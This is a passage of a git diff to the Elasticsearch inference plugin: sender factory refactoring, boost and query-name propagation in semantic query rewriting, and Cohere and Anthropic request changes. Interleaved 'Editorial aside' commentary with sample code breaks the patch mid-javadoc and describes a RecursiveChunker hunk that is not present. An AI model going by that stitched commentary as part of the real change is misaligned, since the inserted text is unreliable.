a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorSet.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorGroup.java similarity index 89% rename from x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorSet.java rename to x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorGroup.java index 61b997b8d17a9..cafd3b08ccf9b 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorSet.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorGroup.java @@ -10,17 +10,17 @@ import java.util.List; import java.util.Locale; -public enum SeparatorSet { +public enum SeparatorGroup { PLAINTEXT("plaintext"), MARKDOWN("markdown"); private final String name; - SeparatorSet(String name) { + SeparatorGroup(String name) { this.name = name; } - public static SeparatorSet fromString(String name) { + public static SeparatorGroup fromString(String name) { return valueOf(name.trim().toUpperCase(Locale.ROOT)); } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSender.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSender.java index 689c9e2ec8fc1..f870f997153a4 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSender.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSender.java @@ -11,7 +11,6 @@ import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.ContextPreservingActionListener; import org.elasticsearch.cluster.service.ClusterService; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Nullable; import org.elasticsearch.core.TimeValue; import org.elasticsearch.inference.InferenceServiceResults; import org.elasticsearch.threadpool.ThreadPool; @@ -42,32 +41,39 @@ public class HttpRequestSender implements Sender { /** * A helper class for constructing a {@link HttpRequestSender}.
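(Editorial aside on the RecursiveChunker hunk above; the HttpRequestSender.Factory javadoc and diff resume below.) The new mergeChunkOffsetsUpToMaxChunkSize pass greedily coalesces adjacent splits from left to right while the combined word count still fits within maxChunkSize, flushing the accumulated chunk whenever the next split would overflow. The following self-contained sketch shows the same greedy pass; ChunkOffsetAndCount here is a simplified stand-in record (the real class wraps a ChunkOffset), and the raw word-count comparison stands in for isChunkWithinMaxSize, so names and types are illustrative rather than the real Elasticsearch classes.

```java
import java.util.ArrayList;
import java.util.List;

public class GreedyMergeSketch {
    // Simplified stand-in for the real ChunkOffsetAndCount, which wraps a ChunkOffset.
    record ChunkOffsetAndCount(int start, int end, int wordCount) {}

    static List<ChunkOffsetAndCount> merge(List<ChunkOffsetAndCount> splits, int maxChunkSize) {
        if (splits.size() < 2) {
            return splits;
        }
        List<ChunkOffsetAndCount> merged = new ArrayList<>();
        var current = splits.getFirst();
        for (int i = 1; i < splits.size(); i++) {
            var next = splits.get(i);
            var combined = new ChunkOffsetAndCount(current.start(), next.end(), current.wordCount() + next.wordCount());
            if (combined.wordCount() <= maxChunkSize) {
                current = combined; // still fits: keep growing the current chunk
            } else {
                merged.add(current); // would overflow: flush and restart from `next`
                current = next;
            }
        }
        merged.add(current); // flush the trailing chunk
        return merged;
    }

    public static void main(String[] args) {
        // Splits of 3, 4 and 6 words with maxChunkSize = 8: the first two merge into one
        // 7-word chunk; adding the third would reach 13 words, so it starts a new chunk.
        var splits = List.of(
            new ChunkOffsetAndCount(0, 10, 3),
            new ChunkOffsetAndCount(10, 25, 4),
            new ChunkOffsetAndCount(25, 50, 6)
        );
        System.out.println(merge(splits, 8)); // two chunks: [0,25] with 7 words, [25,50] with 6
    }
}
```

The diff's variant flushes the accumulator inside the loop when i reaches the last index; flushing once after the loop, as here, is behaviorally equivalent.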
*/ public static class Factory { - private final ServiceComponents serviceComponents; - private final HttpClientManager httpClientManager; - private final ClusterService clusterService; - private final RequestSender requestSender; + private final HttpRequestSender httpRequestSender; public Factory(ServiceComponents serviceComponents, HttpClientManager httpClientManager, ClusterService clusterService) { - this.serviceComponents = Objects.requireNonNull(serviceComponents); - this.httpClientManager = Objects.requireNonNull(httpClientManager); - this.clusterService = Objects.requireNonNull(clusterService); + Objects.requireNonNull(serviceComponents); + Objects.requireNonNull(clusterService); + Objects.requireNonNull(httpClientManager); - requestSender = new RetryingHttpSender( - this.httpClientManager.getHttpClient(), + var requestSender = new RetryingHttpSender( + httpClientManager.getHttpClient(), serviceComponents.throttlerManager(), new RetrySettings(serviceComponents.settings(), clusterService), serviceComponents.threadPool() ); - } - public Sender createSender() { - return new HttpRequestSender( + var startCompleted = new CountDownLatch(1); + var service = new RequestExecutorService( serviceComponents.threadPool(), - httpClientManager, - clusterService, - serviceComponents.settings(), + startCompleted, + new RequestExecutorServiceSettings(serviceComponents.settings(), clusterService), requestSender ); + + httpRequestSender = new HttpRequestSender( + serviceComponents.threadPool(), + httpClientManager, + requestSender, + service, + startCompleted + ); + } + + public Sender createSender() { + return httpRequestSender; } } @@ -75,27 +81,23 @@ public Sender createSender() { private final ThreadPool threadPool; private final HttpClientManager manager; - private final RequestExecutor service; private final AtomicBoolean started = new AtomicBoolean(false); - private final CountDownLatch startCompleted = new CountDownLatch(1); private final RequestSender requestSender; + private final RequestExecutor service; + private final CountDownLatch startCompleted; private HttpRequestSender( ThreadPool threadPool, HttpClientManager httpClientManager, - ClusterService clusterService, - Settings settings, - RequestSender requestSender + RequestSender requestSender, + RequestExecutor service, + CountDownLatch startCompleted ) { this.threadPool = Objects.requireNonNull(threadPool); this.manager = Objects.requireNonNull(httpClientManager); this.requestSender = Objects.requireNonNull(requestSender); - service = new RequestExecutorService( - threadPool, - startCompleted, - new RequestExecutorServiceSettings(settings, clusterService), - requestSender - ); + this.service = Objects.requireNonNull(service); + this.startCompleted = Objects.requireNonNull(startCompleted); } /** diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/highlight/SemanticTextHighlighter.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/highlight/SemanticTextHighlighter.java index 92333a10c4d08..8e55cc9c222b5 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/highlight/SemanticTextHighlighter.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/highlight/SemanticTextHighlighter.java @@ -32,6 +32,7 @@ import org.elasticsearch.search.fetch.subphase.highlight.HighlightField; import org.elasticsearch.search.fetch.subphase.highlight.HighlightUtils; import org.elasticsearch.search.fetch.subphase.highlight.Highlighter; +import 
org.elasticsearch.search.vectors.DenseVectorQuery; import org.elasticsearch.search.vectors.SparseVectorQueryWrapper; import org.elasticsearch.search.vectors.VectorData; import org.elasticsearch.xcontent.Text; @@ -273,6 +274,8 @@ public void visitLeaf(Query query) { queries.add(fieldType.createExactKnnQuery(VectorData.fromBytes(knnQuery.getTargetCopy()), null)); } else if (query instanceof MatchAllDocsQuery) { queries.add(new MatchAllDocsQuery()); + } else if (query instanceof DenseVectorQuery.Floats floatsQuery) { + queries.add(fieldType.createExactKnnQuery(VectorData.fromFloats(floatsQuery.getQuery()), null)); } } }); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapper.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapper.java index 5400bf6acc673..be0349c11f402 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapper.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapper.java @@ -99,6 +99,7 @@ import java.util.function.Function; import java.util.function.Supplier; +import static org.elasticsearch.index.IndexVersions.NEW_SPARSE_VECTOR; import static org.elasticsearch.index.IndexVersions.SEMANTIC_TEXT_DEFAULTS_TO_BBQ; import static org.elasticsearch.index.IndexVersions.SEMANTIC_TEXT_DEFAULTS_TO_BBQ_BACKPORT_8_X; import static org.elasticsearch.inference.TaskType.SPARSE_EMBEDDING; @@ -124,6 +125,7 @@ */ public class SemanticTextFieldMapper extends FieldMapper implements InferenceFieldMapper { private static final Logger logger = LogManager.getLogger(SemanticTextFieldMapper.class); + public static final String UNSUPPORTED_INDEX_MESSAGE = "[semantic_text] is available on indices created with 8.11 or higher."; public static final NodeFeature SEMANTIC_TEXT_IN_OBJECT_FIELD_FIX = new NodeFeature("semantic_text.in_object_field_fix"); public static final NodeFeature SEMANTIC_TEXT_SINGLE_FIELD_UPDATE_FIX = new NodeFeature("semantic_text.single_field_update_fix"); public static final NodeFeature SEMANTIC_TEXT_DELETE_FIX = new NodeFeature("semantic_text.delete_fix"); @@ -156,6 +158,9 @@ public static final TypeParser parser(Supplier modelRegistry) { public static BiConsumer validateParserContext(String type) { return (n, c) -> { + if (c.getIndexSettings().getIndexVersionCreated().before(NEW_SPARSE_VECTOR)) { + throw new UnsupportedOperationException(UNSUPPORTED_INDEX_MESSAGE); + } if (InferenceMetadataFieldsMapper.isEnabled(c.getIndexSettings().getSettings()) == false) { notInMultiFields(type).accept(n, c); } @@ -1223,7 +1228,7 @@ static boolean indexVersionDefaultsToBbqHnsw(IndexVersion indexVersion) { || indexVersion.between(SEMANTIC_TEXT_DEFAULTS_TO_BBQ_BACKPORT_8_X, IndexVersions.UPGRADE_TO_LUCENE_10_0_0); } - static DenseVectorFieldMapper.DenseVectorIndexOptions defaultBbqHnswDenseVectorIndexOptions() { + public static DenseVectorFieldMapper.DenseVectorIndexOptions defaultBbqHnswDenseVectorIndexOptions() { int m = Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN; int efConstruction = Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH; DenseVectorFieldMapper.RescoreVector rescoreVector = new DenseVectorFieldMapper.RescoreVector(DEFAULT_RESCORE_OVERSAMPLE); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticKnnVectorQueryRewriteInterceptor.java 
b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticKnnVectorQueryRewriteInterceptor.java index 9e513a1ed9226..b1f5c240371f8 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticKnnVectorQueryRewriteInterceptor.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticKnnVectorQueryRewriteInterceptor.java @@ -52,16 +52,20 @@ protected QueryBuilder buildInferenceQuery(QueryBuilder queryBuilder, InferenceI assert (queryBuilder instanceof KnnVectorQueryBuilder); KnnVectorQueryBuilder knnVectorQueryBuilder = (KnnVectorQueryBuilder) queryBuilder; Map<String, List<String>> inferenceIdsIndices = indexInformation.getInferenceIdsIndices(); + QueryBuilder finalQueryBuilder; if (inferenceIdsIndices.size() == 1) { // Simple case, everything uses the same inference ID Map.Entry<String, List<String>> inferenceIdIndex = inferenceIdsIndices.entrySet().iterator().next(); String searchInferenceId = inferenceIdIndex.getKey(); List<String> indices = inferenceIdIndex.getValue(); - return buildNestedQueryFromKnnVectorQuery(knnVectorQueryBuilder, indices, searchInferenceId); + finalQueryBuilder = buildNestedQueryFromKnnVectorQuery(knnVectorQueryBuilder, indices, searchInferenceId); } else { // Multiple inference IDs, construct a boolean query - return buildInferenceQueryWithMultipleInferenceIds(knnVectorQueryBuilder, inferenceIdsIndices); + finalQueryBuilder = buildInferenceQueryWithMultipleInferenceIds(knnVectorQueryBuilder, inferenceIdsIndices); } + finalQueryBuilder.boost(queryBuilder.boost()); + finalQueryBuilder.queryName(queryBuilder.queryName()); + return finalQueryBuilder; } private QueryBuilder buildInferenceQueryWithMultipleInferenceIds( @@ -102,6 +106,8 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( ) ); } + boolQueryBuilder.boost(queryBuilder.boost()); + boolQueryBuilder.queryName(queryBuilder.queryName()); return boolQueryBuilder; } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticMatchQueryRewriteInterceptor.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticMatchQueryRewriteInterceptor.java index fd1d65d00faf5..a6599afc66c3f 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticMatchQueryRewriteInterceptor.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticMatchQueryRewriteInterceptor.java @@ -36,7 +36,10 @@ protected String getQuery(QueryBuilder queryBuilder) { @Override protected QueryBuilder buildInferenceQuery(QueryBuilder queryBuilder, InferenceIndexInformationForField indexInformation) { - return new SemanticQueryBuilder(indexInformation.fieldName(), getQuery(queryBuilder), false); + SemanticQueryBuilder semanticQueryBuilder = new SemanticQueryBuilder(indexInformation.fieldName(), getQuery(queryBuilder), false); + semanticQueryBuilder.boost(queryBuilder.boost()); + semanticQueryBuilder.queryName(queryBuilder.queryName()); + return semanticQueryBuilder; } @Override @@ -45,7 +48,10 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( InferenceIndexInformationForField indexInformation ) { assert (queryBuilder instanceof MatchQueryBuilder); - MatchQueryBuilder matchQueryBuilder = (MatchQueryBuilder) queryBuilder; + MatchQueryBuilder originalMatchQueryBuilder = (MatchQueryBuilder) queryBuilder; + // Create a copy for non-inference fields without boost and _name + MatchQueryBuilder
matchQueryBuilder = copyMatchQueryBuilder(originalMatchQueryBuilder); + BoolQueryBuilder boolQueryBuilder = new BoolQueryBuilder(); boolQueryBuilder.should( createSemanticSubQuery( @@ -55,6 +61,8 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( ) ); boolQueryBuilder.should(createSubQueryForIndices(indexInformation.nonInferenceIndices(), matchQueryBuilder)); + boolQueryBuilder.boost(queryBuilder.boost()); + boolQueryBuilder.queryName(queryBuilder.queryName()); return boolQueryBuilder; } @@ -62,4 +70,24 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( public String getQueryName() { return MatchQueryBuilder.NAME; } + + private MatchQueryBuilder copyMatchQueryBuilder(MatchQueryBuilder queryBuilder) { + MatchQueryBuilder matchQueryBuilder = new MatchQueryBuilder(queryBuilder.fieldName(), queryBuilder.value()); + matchQueryBuilder.operator(queryBuilder.operator()); + matchQueryBuilder.prefixLength(queryBuilder.prefixLength()); + matchQueryBuilder.maxExpansions(queryBuilder.maxExpansions()); + matchQueryBuilder.fuzzyTranspositions(queryBuilder.fuzzyTranspositions()); + matchQueryBuilder.lenient(queryBuilder.lenient()); + matchQueryBuilder.zeroTermsQuery(queryBuilder.zeroTermsQuery()); + matchQueryBuilder.analyzer(queryBuilder.analyzer()); + matchQueryBuilder.minimumShouldMatch(queryBuilder.minimumShouldMatch()); + matchQueryBuilder.fuzzyRewrite(queryBuilder.fuzzyRewrite()); + + if (queryBuilder.fuzziness() != null) { + matchQueryBuilder.fuzziness(queryBuilder.fuzziness()); + } + + matchQueryBuilder.autoGenerateSynonymsPhraseQuery(queryBuilder.autoGenerateSynonymsPhraseQuery()); + return matchQueryBuilder; + } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticSparseVectorQueryRewriteInterceptor.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticSparseVectorQueryRewriteInterceptor.java index a35e83450c55a..c85a21f10301d 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticSparseVectorQueryRewriteInterceptor.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticSparseVectorQueryRewriteInterceptor.java @@ -43,14 +43,18 @@ protected String getQuery(QueryBuilder queryBuilder) { @Override protected QueryBuilder buildInferenceQuery(QueryBuilder queryBuilder, InferenceIndexInformationForField indexInformation) { Map<String, List<String>> inferenceIdsIndices = indexInformation.getInferenceIdsIndices(); + QueryBuilder finalQueryBuilder; if (inferenceIdsIndices.size() == 1) { // Simple case, everything uses the same inference ID String searchInferenceId = inferenceIdsIndices.keySet().iterator().next(); - return buildNestedQueryFromSparseVectorQuery(queryBuilder, searchInferenceId); + finalQueryBuilder = buildNestedQueryFromSparseVectorQuery(queryBuilder, searchInferenceId); } else { // Multiple inference IDs, construct a boolean query - return buildInferenceQueryWithMultipleInferenceIds(queryBuilder, inferenceIdsIndices); + finalQueryBuilder = buildInferenceQueryWithMultipleInferenceIds(queryBuilder, inferenceIdsIndices); } + finalQueryBuilder.queryName(queryBuilder.queryName()); + finalQueryBuilder.boost(queryBuilder.boost()); + return finalQueryBuilder; } private QueryBuilder buildInferenceQueryWithMultipleInferenceIds( @@ -82,7 +86,14 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( boolQueryBuilder.should( createSubQueryForIndices( indexInformation.nonInferenceIndices(), -
createSubQueryForIndices(indexInformation.nonInferenceIndices(), sparseVectorQueryBuilder) + new SparseVectorQueryBuilder( + sparseVectorQueryBuilder.getFieldName(), + sparseVectorQueryBuilder.getQueryVectors(), + sparseVectorQueryBuilder.getInferenceId(), + sparseVectorQueryBuilder.getQuery(), + sparseVectorQueryBuilder.shouldPruneTokens(), + sparseVectorQueryBuilder.getTokenPruningConfig() + ) ) ); // We always perform nested subqueries on semantic_text fields, to support @@ -95,6 +106,8 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( ) ); } + boolQueryBuilder.boost(queryBuilder.boost()); + boolQueryBuilder.queryName(queryBuilder.queryName()); return boolQueryBuilder; } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSender.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSender.java index 60f274b161d1b..ccc52087288d0 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSender.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSender.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.action.ActionListener; import org.elasticsearch.cluster.service.ClusterService; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.TimeValue; import org.elasticsearch.inference.InferenceServiceResults; import org.elasticsearch.threadpool.ThreadPool; @@ -38,31 +37,46 @@ public class AmazonBedrockRequestSender implements Sender { public static class Factory { private final ServiceComponents serviceComponents; - private final ClusterService clusterService; + private final AmazonBedrockRequestExecutorService executorService; + private final CountDownLatch startCompleted = new CountDownLatch(1); + private final AmazonBedrockRequestSender bedrockRequestSender; public Factory(ServiceComponents serviceComponents, ClusterService clusterService) { - this.serviceComponents = Objects.requireNonNull(serviceComponents); - this.clusterService = Objects.requireNonNull(clusterService); - } - - public Sender createSender() { - var clientCache = new AmazonBedrockInferenceClientCache( - (model, timeout) -> AmazonBedrockInferenceClient.create(model, timeout, serviceComponents.threadPool()), - Clock.systemUTC() + this( + serviceComponents, + clusterService, + new AmazonBedrockExecuteOnlyRequestSender( + new AmazonBedrockInferenceClientCache( + (model, timeout) -> AmazonBedrockInferenceClient.create(model, timeout, serviceComponents.threadPool()), + Clock.systemUTC() + ), + serviceComponents.throttlerManager() + ) ); - return createSender(new AmazonBedrockExecuteOnlyRequestSender(clientCache, serviceComponents.throttlerManager())); } - Sender createSender(AmazonBedrockExecuteOnlyRequestSender requestSender) { - var sender = new AmazonBedrockRequestSender( + public Factory( + ServiceComponents serviceComponents, + ClusterService clusterService, + AmazonBedrockExecuteOnlyRequestSender requestSender + ) { + this.serviceComponents = Objects.requireNonNull(serviceComponents); + Objects.requireNonNull(clusterService); + + executorService = new AmazonBedrockRequestExecutorService( serviceComponents.threadPool(), - clusterService, - serviceComponents.settings(), - Objects.requireNonNull(requestSender) + 
startCompleted, + new RequestExecutorServiceSettings(serviceComponents.settings(), clusterService), + requestSender ); + + bedrockRequestSender = new AmazonBedrockRequestSender(serviceComponents.threadPool(), executorService, startCompleted); + } + + public Sender createSender() { // ensure this is started - sender.start(); - return sender; + bedrockRequestSender.start(); + return bedrockRequestSender; } } @@ -71,21 +85,16 @@ Sender createSender(AmazonBedrockExecuteOnlyRequestSender requestSender) { private final ThreadPool threadPool; private final AmazonBedrockRequestExecutorService executorService; private final AtomicBoolean started = new AtomicBoolean(false); - private final CountDownLatch startCompleted = new CountDownLatch(1); + private final CountDownLatch startCompleted; protected AmazonBedrockRequestSender( ThreadPool threadPool, - ClusterService clusterService, - Settings settings, - AmazonBedrockExecuteOnlyRequestSender requestSender + AmazonBedrockRequestExecutorService executorService, + CountDownLatch startCompleted ) { this.threadPool = Objects.requireNonNull(threadPool); - executorService = new AmazonBedrockRequestExecutorService( - threadPool, - startCompleted, - new RequestExecutorServiceSettings(settings, clusterService), - requestSender - ); + this.executorService = Objects.requireNonNull(executorService); + this.startCompleted = Objects.requireNonNull(startCompleted); } @Override diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/embeddings/AmazonBedrockEmbeddingsTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/embeddings/AmazonBedrockEmbeddingsTaskSettings.java index bb0a8a3348ada..ad06e669ff567 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/embeddings/AmazonBedrockEmbeddingsTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/amazonbedrock/embeddings/AmazonBedrockEmbeddingsTaskSettings.java @@ -79,9 +79,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.AMAZON_BEDROCK_TASK_SETTINGS; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.AMAZON_BEDROCK_TASK_SETTINGS) + || version.isPatchFrom(TransportVersions.AMAZON_BEDROCK_TASK_SETTINGS_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalEnum(cohereTruncation()); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicService.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicService.java index bec8908ab73f9..791518ccc9168 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicService.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicService.java @@ -263,6 +263,19 @@ public static InferenceServiceConfiguration get() { .build() ); + configurationMap.put( + AnthropicServiceFields.MAX_TOKENS, + new SettingsConfiguration.Builder(EnumSet.of(TaskType.COMPLETION)).setDescription( + "The maximum number of tokens to generate before stopping." 
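(Editorial aside on the sender refactors above; the Anthropic configuration hunk resumes below.) Both HttpRequestSender.Factory and AmazonBedrockRequestSender.Factory now assemble the request executor service and the sender once, in the factory constructor, and createSender() hands out that single shared instance, with a CountDownLatch letting callers block until the executor has actually started. A minimal sketch of that shape follows; the stripped-down Sender, RequestExecutor, and Factory types are illustrative stand-ins for the real classes, not their actual APIs.

```java
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.atomic.AtomicBoolean;

// Stand-in for the real executor service; functional so a lambda can implement it.
interface RequestExecutor extends Runnable {}

public final class SenderFactorySketch {
    public static final class Sender {
        private final RequestExecutor service;
        private final CountDownLatch startCompleted;
        private final AtomicBoolean started = new AtomicBoolean(false);

        Sender(RequestExecutor service, CountDownLatch startCompleted) {
            this.service = service;
            this.startCompleted = startCompleted;
        }

        public void start() {
            // Only the first caller spawns the executor thread; later calls are no-ops.
            if (started.compareAndSet(false, true)) {
                new Thread(service).start();
            }
        }

        public void send() throws InterruptedException {
            start();
            startCompleted.await(); // block until the executor signals readiness
            // ... enqueue the request with the executor ...
        }
    }

    // The factory wires executor + latch exactly once and always returns the same sender.
    public static final class Factory {
        private final Sender sender;

        public Factory() {
            var startCompleted = new CountDownLatch(1);
            RequestExecutor executor = startCompleted::countDown; // signal on startup
            sender = new Sender(executor, startCompleted);
        }

        public Sender createSender() {
            return sender;
        }
    }
}
```

The practical effect of this shape is that repeated createSender() calls can no longer spin up duplicate executor services, and the AtomicBoolean guard keeps start() idempotent.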
+ ) + .setLabel("Max Tokens") + .setRequired(true) + .setSensitive(false) + .setUpdatable(false) + .setType(SettingsConfigurationFieldType.INTEGER) + .build() + ); + configurationMap.putAll(DefaultSecretSettings.toSettingsConfiguration(supportedTaskTypes)); configurationMap.putAll( RateLimitSettings.toSettingsConfigurationWithDescription( diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/CohereUtils.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/CohereUtils.java index f512444c6d6a4..2d52a8a9dadbb 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/CohereUtils.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/CohereUtils.java @@ -28,13 +28,16 @@ public class CohereUtils { public static final String DOCUMENTS_FIELD = "documents"; public static final String EMBEDDING_TYPES_FIELD = "embedding_types"; public static final String INPUT_TYPE_FIELD = "input_type"; - public static final String MESSAGE_FIELD = "message"; + public static final String V1_MESSAGE_FIELD = "message"; + public static final String V2_MESSAGES_FIELD = "messages"; public static final String MODEL_FIELD = "model"; public static final String QUERY_FIELD = "query"; + public static final String V2_ROLE_FIELD = "role"; public static final String SEARCH_DOCUMENT = "search_document"; public static final String SEARCH_QUERY = "search_query"; - public static final String TEXTS_FIELD = "texts"; public static final String STREAM_FIELD = "stream"; + public static final String TEXTS_FIELD = "texts"; + public static final String USER_FIELD = "user"; public static Header createRequestSourceHeader() { return new BasicHeader(REQUEST_SOURCE_HEADER, ELASTIC_REQUEST_SOURCE); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v1/CohereV1CompletionRequest.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v1/CohereV1CompletionRequest.java index 4fa4552dcd94d..0be1ba8d25f29 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v1/CohereV1CompletionRequest.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v1/CohereV1CompletionRequest.java @@ -30,7 +30,7 @@ public CohereV1CompletionRequest(List input, CohereCompletionModel model public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { builder.startObject(); // we only allow one input for completion, so always get the first one - builder.field(CohereUtils.MESSAGE_FIELD, input.getFirst()); + builder.field(CohereUtils.V1_MESSAGE_FIELD, input.getFirst()); if (getModelId() != null) { builder.field(CohereUtils.MODEL_FIELD, getModelId()); } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequest.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequest.java index 028c4a0d486c0..1a8eae321ac77 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequest.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequest.java @@ -29,8 
+29,13 @@ public CohereV2CompletionRequest(List input, CohereCompletionModel model @Override public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { builder.startObject(); + builder.startArray(CohereUtils.V2_MESSAGES_FIELD); + builder.startObject(); + builder.field(CohereUtils.V2_ROLE_FIELD, CohereUtils.USER_FIELD); // we only allow one input for completion, so always get the first one - builder.field(CohereUtils.MESSAGE_FIELD, input.getFirst()); + builder.field("content", input.getFirst()); + builder.endObject(); + builder.endArray(); builder.field(CohereUtils.MODEL_FIELD, getModelId()); builder.field(CohereUtils.STREAM_FIELD, isStreaming()); builder.endObject(); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomSecretSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomSecretSettings.java index ac6b7ab10c8b3..4c2ff22a5829a 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomSecretSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomSecretSettings.java @@ -90,9 +90,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED) + || version.isPatchFrom(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeMap(secretParameters, StreamOutput::writeSecureString); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomService.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomService.java index deb6e17ec5311..4a4166cf65ed3 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomService.java +++ 